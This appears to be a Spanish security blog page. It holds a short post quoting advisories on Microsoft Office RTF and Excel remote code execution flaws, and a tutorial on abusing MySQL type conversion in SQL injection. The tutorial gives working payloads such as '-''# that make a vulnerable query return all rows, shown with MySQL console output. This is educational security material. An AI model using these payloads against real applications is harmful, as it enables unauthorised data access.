Cito a Inteco: "Desbordamiento de búfer basado en pila en Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 y 2008 para Mac, Office para Mac 2011 y Open XML File Format Converter para Mac permite a atacantes remotos ejecutar código de su elección mediante datos RTF manipulados, también conocido como "RTF Stack Buffer Overflow Vulnerability."

Para los que quieran profundidar a nivel más bajo en el por qué de este fallo de Microsoft Word, encontré un artículo muy bueno en el blog Unlearning security  el cual recomiendo que reviséis porque explicarlo de nuevo aquí sería una pérdida de tiempo..

De nuevo Inteco: "Microsoft Office Excel v2002 SP3, v2003 SP3, y 2007 SP1 y SP2; Office v2004 y v2008 para Mac; Open XML File Format Converter para Macato ; Office Excel Viewer v2003 SP3; Office Excel Viewer SP1 y SP2; y Office Compatibility Pack para Word, Excel, y PowerPoint v2007 File Formats SP1 y SP2 no analiza adecuadamente el formato del fichero Excel, lo que permite a atacantes remotos ejecutar código de su elección a través de una hoja de cálculo con un registro de objeto manipulada, como "vulnerabilidad de corrupción de memoria en el registro Featheader de Excel"."

La manera de actuar para llevar a cabo el ataque es muy similar en los tres casos. Pero para que quede cristalino os adjunto un vídeo:




Bueno chicos, sed buenos y hasta que tenga otro rato de ocio, que ultimamente   escasean....

Abusando de la conversión de tipos para pequeñas inyecciones en MySQL

$
0
0
Leyendo el blog de Koto (Krzysztof Kotowicz) encontré un pequeño truco que puede ayudarnos a explotar inyecciones SQL en bases de datos MySQL. Primero vamos a ver el comportamiento del RBDMS:

mysql> desc t;
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| name  | varchar(20) | YES  |     | NULL    |       |
| num   | int(11)     | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
2 rows in set (0.11 sec)
mysql> select * from t;
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set (0.00 sec)
mysql> select * from t where name='';
Empty set (0.00 sec)
mysql> select * from t where name=''-'';
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set, 2 warnings (0.00 sec)


¿Qué es lo que ha pasado? Vamos a investigar un poco:


mysql> show warnings;
+---------+------+--------------------------------------------+
| Level   | Code | Message                                    |
+---------+------+--------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'nazwa'  |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'second' |
+---------+------+--------------------------------------------+
2 rows in set (0.00 sec)


El operador menos "-" utilizado en el string la convierte a DOUBLE, un valor numérico. ¿Cual es el resultado de esta sentencia?:

mysql> select ''-'';
+-------+
| ''-'' |
+-------+
|     0 |
+-------+


Para cada registro la columna 'name' es comparada a 0, lo cual provoca otro tipo de conversión y, con un warning, el valor de cada uno de ellos es efectivamente 0, lo cual satisface la condición WHERE (0 = ''-'').

Ahora, ¿cómo podemos abusar de esta peculiaridad? Imagina que tienes un juego de caracteres limitado (por ejemplo, sin espacios en blanco, sin signo de igualdad, sin paréntesis, sin letras) o la longitud disponible es muy limitada. La query vulnerable es SELECT secret FROM table WHERE secret='$injection' AND another>5 AND ... y necesita devolver al menos algún valor, pero no conoces ninguno en la columna secret (la cual no es fácilmente enumerable). Un payload tan simple como '-''# convertirá la query a:

SELECT secret FROM table WHERE fld=''-''# AND .....

y devolverá todos los registros (a parte de los que coincidan con /^-?[0-9]/).

Además puedes usar el mismo truco con ''+'', ''&'',''^'' y ''*''. Ten en cuenta:

mysql> select 1 from dual where 'something' = ''/'';
Empty set, 1 warning (0.00 sec)

mysql> select 1 from dual where 'something' = ''/1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set, 1 warning (0.00 sec)


Otro truco sería comparar simplemente una columna de cadena con ''-0:

mysql> select * from t where name=''-0;
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set, 2 warnings (0.00 sec)


Todas estas sentencias SQL fueron probadas en MySQL 5.5 y 5.1, aunque debería funcionar en versiones anteriores también.

Y eso es todo amigos. Para más técnicas de inyección SQL te recomiendo la referencia de inyecciones SQL de Roberto Salgado. Me ayudó en numerosas ocasiones y es en mi opinión es una las mejores sobre SQLi que se han hecho nunca.
Viewing all 1660 articles
Browse latest View live